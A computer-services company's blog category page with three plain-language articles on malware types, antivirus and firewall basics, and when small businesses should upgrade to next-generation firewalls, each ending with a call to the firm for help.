Category Guidance

Introduction to Malicious Software

by Billy J Long Guidance, PSA Articles

Article (PSA‑0003) – Updated 2025

Even after a decade of rapid growth, malware remains the primary vector for data theft, ransomware, and large‑scale cyber‑crime. Recent industry reports illustrate the scale:

  • Symantec (Broadcom) 2024 Threat Report – > 1 billion new malicious files detected in the last 12 months, a 12 % increase over 2023.
  • Kaspersky 2024 Security Bulletin – ≈ 3 million + malware‑related alerts per day, with a 45 % rise in ransomware attempts.
  • Microsoft 2024 Digital Threat Landscape – Cryptojacking incidents grew 87 % YoY, and “file‑less” attacks now account for ≈ 30 % of all detections on Windows platforms.

All of these numbers point to a single truth: malware is a money‑making industry. Attackers steal personal data and financial credentials, then leverage compromised machines to launch further attacks, sell access, or extort victims.

What Is Malware?

Malware = malicious software – a blanket term for any program that infiltrates a system without the user’s consent. It includes, but is not limited to, viruses, spyware, adware, ransomware, botnets, cryptominers, and file‑less payloads.

Common infection vectors (still relevant)

  • Infected email attachments or malicious links in phishing messages.
  • Compromised USB/thumb drives and other removable media.
  • Downloads from untrusted websites or pirated software.
  • Drive‑by downloads via compromised legitimate sites (malvertising).
  • Supply‑chain compromises – malicious code injected into trusted software updates (e.g., SolarWinds, Accellion).

Malware Categories – 2025 Edition

  • Viruses – Self‑replicating code that can corrupt files and degrade system performance.
  • Spyware / Keyloggers – Record user input, screenshots, or system activity to steal credentials.
  • Adware – Serve unwanted advertisements, often bundled with free software.
  • Scareware – Pretend to be a legitimate security product, coercing users into paying for fake fixes.
  • Ransomware – Encrypt files and demand payment; modern variants (e.g., LockBit 2.0, Hive) include “double‑extortion” – stealing data and threatening public release.
  • Botnets – Networks of compromised devices used for spam, DDoS attacks, or credential‑stuffing.
  • Cryptominers (Cryptojacking) – Hijack CPU/GPU cycles to mine cryptocurrency without the user’s knowledge.
  • File‑less (Living‑off‑the‑Land) malware – Execute malicious code directly in memory using legitimate OS tools (PowerShell, WMI, Cobalt Strike). No files are written to disk, making traditional AV signatures less effective.

Do You Need to Worry About Malware?

Yes – both home users and businesses are prime targets. A breach can lead to:

  • Loss or theft of personal photos, family videos, or critical business documents.
  • Financial liability when customer data (PCI, PHI, PII) is exposed.
  • Operational downtime that costs the average small business ≈ $200 k per incident (National Cybersecurity Center, 2024).
  • Ransom payments (average ≈ $300 k in 2024) and the associated loss of trust.

How to Protect Yourself – Updated Best Practices (2025)

  1. Keep the operating system and all software patched. Enable automatic updates wherever possible.
  2. Use a reputable, actively‑maintained antivirus/antispyware solution. Choose products that combine signature‑based detection with AI/behavioral analysis (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone, SentinelOne).
  3. Enable a host‑based firewall. Windows Defender Firewall or macOS Application Firewall should be on with default “block inbound unless requested” rules.
  4. Employ multi‑factor authentication (MFA) on all cloud and privileged accounts.
  5. Back up data using the 3‑2‑1‑0 rule. Verify backups quarterly and store at least one copy immutable.
  6. Educate users. Phishing simulations, safe‑browsing habits, and a “don’t open unknown attachments” policy reduce the human attack surface.
  7. Limit user privileges. Run daily work as a standard user; reserve admin rights for IT staff only.
  8. Use email and web filtering solutions. They block known malicious links, attachments, and exploit kits before they reach the endpoint.
  9. Deploy endpoint detection & response (EDR) for real‑time monitoring of suspicious behavior, especially to catch file‑less attacks.
  10. Monitor network traffic. Intrusion detection/prevention systems (IDS/IPS) and DNS‑filtering services (e.g., Quad9, Cloudflare DNS‑SEC) add another layer of defense.

What to Do If You Suspect an Infection

  1. Disconnect from the network. Disable Wi‑Fi/Ethernet to stop further spread.
  2. Update your AV/EDR definitions and run a full system scan (not just a quick/real‑time scan).
  3. Follow the remediation steps provided by the security tool (quarantine, delete, or repair).
  4. Reboot in Safe Mode (Windows) or Recovery mode (macOS) if the malware persists.
  5. Change passwords on a clean device, especially for email, banking, and any admin accounts.
  6. Restore from a verified backup if files were encrypted or corrupted.
  7. Contact a professional if you cannot fully remove the infection or if ransomware demands payment. Paying does not guarantee decryption and often fuels the criminal ecosystem.

Further Reading

Next Up

In the next article we’ll dive into “How Antivirus and Antispyware Work” and what to look for when choosing a solution.

Need Assistance?

If you suspect your computer is infected or you want a professional assessment of your security posture, call PSA Computer Services at (707) 506‑6802. We’ll help you clean the infection, harden your defenses, and get you back to work safely.

When to Upgrade Your Security – Four Key Considerations

by Billy J Long Guidance, PSA Articles

Article (PSA‑0002‑C)

Below is a plain‑language breakdown of the four situations that typically justify moving beyond a basic home‑router firewall to a more capable solution such as a commercial next‑generation firewall (NGFW), unified‑threat‑management platform, or a managed security service.

1️⃣ You run a small business with multiple endpoints and need centralized management

  • What it means – You have 5 – 20 devices (PCs, laptops, printers, VoIP phones, servers) spread across one or more locations.
  • Why a basic firewall falls short – Each device must be configured manually, creating a high risk of “policy drift” where some machines stay open to the Internet.
  • What you need from a new solution
    • A single management console (cloud‑based or on‑prem) that can push policies, updates, and patches to every endpoint.
    • Policy templates that apply the same rule set to all devices automatically.
    • Device‑aware logging that ties every event to a hostname, MAC address, or user for easy forensics.

2️⃣ Ransomware or phishing attacks are a frequent threat in your industry

  • What it means – Malicious PDFs, Office documents, or links that deliver ransomware; fake login pages that harvest credentials.
  • Why a simple firewall can’t stop it – Basic NAT/firewall only looks at IP/port; it can’t inspect file payloads or block a phishing URL that resolves correctly.
  • What you need from a more robust platform
    • Content‑inspection and sandboxing – unknown files are executed in a safe VM before delivery.
    • URL and web‑reputation filtering to block known phishing domains in real time.
    • Network segmentation/micro‑segmentation so an infected workstation can’t reach every other device.
    • EDR integration to stop ransomware processes on the endpoint and auto‑rollback changes.

3️⃣ You require application‑aware filtering, IDS/IPS, or secure remote‑access VPNs

  • What it means
    • Allow Zoom video but block Zoom file‑sharing.
    • Detect and block known exploit attempts (e.g., EternalBlue).
    • Provide encrypted, MFA‑protected VPN tunnels for remote staff.
  • Why standard NAT routers can’t deliver
    • Home routers only see TCP/UDP ports – they can’t differentiate between applications that share the same port.
    • No built‑in IDS/IPS signatures, so exploits go unnoticed.
    • VPN support is often old PPTP/L2TP and lacks MFA or split‑tunnel control.
  • What a modern NGFW (or complementary appliance) offers
    • App‑ID/DPI – precise, per‑application policies (allow, limit, or block).
    • Signature‑based IPS plus behavioral analytics for zero‑day protection.
    • Modern SSL/TLS or IPsec VPN with MFA, client certificates, and detailed session logging.
    • Optional ZTNA layer for identity‑based, context‑aware access.

4️⃣ You must comply with regulations (HIPAA, PCI‑DSS, GDPR) that mandate specific security controls

  • HIPAA – audit logs, encryption, role‑based access for ePHI
    • How a basic firewall fails: No immutable logs, no enforced TLS for internal traffic, no RBAC for rule changes.
    • Required capabilities:
      • Detailed, tamper‑proof audit logging (forwarded to a SIEM or immutable storage).
      • TLS/SSL inspection and encryption enforcement for any traffic containing PHI.
      • RBAC so only authorized staff can modify firewall policies.
  • PCI‑DSS – segmentation, IDS/IPS, strict firewall configuration
    • How a basic firewall fails: No VLAN‑based segmentation, no IDS/IPS, and no change‑management logs.
    • Required capabilities:
      • Network segmentation (separate CHD zone) with firewall rules that isolate card‑holder data.
      • Built‑in IDS/IPS to detect attacks against payment‑card servers.
      • Change‑management logging for every rule alteration.
  • GDPR – data‑loss prevention, breach‑notification readiness, encryption
    • How a basic firewall fails: No outbound data‑filtering, no guaranteed encryption, limited visibility for breach forensics.
    • Required capabilities:
      • DLP or outbound filtering to prevent accidental export of personal data.
      • Enforced TLS for all traffic that could carry EU personal data.
      • Comprehensive logging to meet the 72‑hour breach‑notification window.

How to Act on These Considerations

  • Multiple devices? Deploy a centralized endpoint‑protection platform (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone) and pair it with a lightweight NGFW (FortiGate 60F, Palo Alto PA‑220).
  • Ransomware/phishing frequent? Add sandboxing, URL filtering, and network segmentation; enable EDR on all endpoints.
  • Need app‑aware control, IDS/IPS, VPN? Choose an NGFW that bundles those services or combine a dedicated VPN concentrator with a separate IDS/IPS sensor.
  • Regulatory compliance required? Verify the firewall is certified for PCI‑DSS/HIPAA, enable immutable logging, TLS inspection, and RBAC. Consider a managed security service that handles audit‑ready reporting.

Need a Tailored Recommendation?

If any of the four triggers above sound familiar, it’s time to move beyond a consumer‑grade router. PSA Computer Services can evaluate your environment, recommend a solution that fits your budget, and handle the deployment so you can focus on your business.

Call us today at (707) 506‑6802 for an assessment and a roadmap to a more secure network.

Security, Is More Better?

by Billy J Long Guidance, PSA Articles

Article (PSA‑0002)

Security requirements vary by how a computer is used. For a quick assessment you can split the environment into two categories:

  • Online (Internet‑connected) devices – need real‑time threat detection and a firewall.
  • Offline (stand‑alone) devices – may need fewer safeguards, but still require some protection if they ever exchange media with other systems.

1️⃣ Online Devices – Core Requirements

Antivirus / Antimalware

A modern, licensed solution that provides both **real‑time** and **scheduled** scanning is essential.

  • Real‑time scanning – Monitors files as they are created, downloaded, or executed and blocks known threats instantly.
  • Scheduled scanning – Performs a deep scan of the entire drive (or selected folders) on a regular basis (daily, weekly, or monthly) to catch dormant or missed malware.
Built‑in options (2025)
  • Windows 10/11 – Microsoft Defender – Free, always‑on, AI‑enhanced, and centrally manageable via Microsoft Endpoint Manager.
  • macOS – Xprotect + Gatekeeper – Native malware detection and notarization checks for downloaded apps.
  • Linux – ClamAV, Sophos Home for Linux, or commercial EDR agents – Useful for servers or workstations that run Linux.
When to consider a third‑party solution

If you need additional features such as ransomware‑specific protection, web‑filtering, or centralized reporting for multiple endpoints, look at reputable vendors like Bitdefender GravityZone, SentinelOne, or ESET Endpoint Security.

Firewall

A firewall controls inbound and outbound traffic based on a set of rules. Two layers are common:

  • Software firewall – Built into the OS (Windows Defender Firewall, macOS Application Firewall, Linux UFW/nftables). It blocks unsolicited inbound connections and can restrict outbound traffic.
  • Hardware firewall – The router or a dedicated appliance (e.g., Ubiquiti EdgeRouter, Cisco Meraki, or a commercial NGFW – Next‑Generation Firewall). It adds network‑level filtering and NAT, keeping the entire LAN hidden from the Internet.

For most home users and small businesses the combination of the OS firewall plus the router’s NAT/packet‑filter is more than adequate.

2️⃣ Offline (Never‑Connected) Devices – What to Consider

If a computer truly never touches the Internet and never receives files from another network, you can forego a full‑time antivirus program. However, keep these points in mind:

  • Even removable media (USB sticks, external HDDs) can carry malware. Scan any media before it is introduced to an offline system.
  • Use a lightweight on‑access scanner (e.g., Windows Defender in “offline scan” mode) for occasional checks.
  • Maintain a strict air‑gap policy: keep the device physically separated and disable any wireless adapters.

Why One Security Suite Is Usually Enough

Running multiple antivirus products on the same machine creates more problems than it solves. The most common issues are:

  1. RAM depletion – Each engine consumes memory. When RAM runs out the OS starts paging to disk, causing severe slow‑downs.
  2. Software conflicts – Two real‑time scanners can flag each other’s activity as malicious, leading to endless alerts and potential system instability.
  3. Quarantine of critical files – One product may mistakenly quarantine the other’s core components, leaving both programs corrupted.
  4. Administrative overhead – Managing multiple licences, updates, and alert streams is time‑consuming and costly.

For the vast majority of users, **one up‑to‑date antivirus/antispyware product plus a properly configured firewall** provides comprehensive protection.

Practical Checklist – Get Secure in Minutes

  • Enable the built‑in OS firewall. Verify that inbound connections are blocked unless you explicitly allow them.
  • Install a reputable antivirus. If you’re on Windows 10/11, make sure Microsoft Defender is turned on and receiving updates.
  • Schedule a weekly full scan. Set the scan for off‑hours to avoid interrupting work.
  • Keep the system patched. Enable automatic OS updates and apply vendor patches for all installed software.
  • Use strong, unique passwords and enable multi‑factor authentication (MFA) on all cloud accounts.
  • Back up your data. Apply the 3‑2‑1‑0 rule (see PSA‑0005) and test restores quarterly.
  • Limit admin privileges. Operate daily tasks as a standard user; reserve Administrator rights for installs and system changes.

When to Upgrade Your Protection

Consider a more advanced solution if any of the following apply:

  • You run a small business with multiple endpoints and need centralized management.
  • Ransomware or phishing attacks are a frequent threat in your industry.
  • You require application‑aware filtering, IDS/IPS, or secure remote‑access VPNs.
  • You must comply with regulations (HIPAA, PCI‑DSS, GDPR) that mandate specific security controls.

Need Professional Help?

If you’re unsure about the right antivirus, firewall configuration, or overall security posture for your home or business, call PSA Computer Services at (707) 506‑6802. We’ll perform a quick health check, recommend a solution that fits your budget, and set everything up so you can work safely.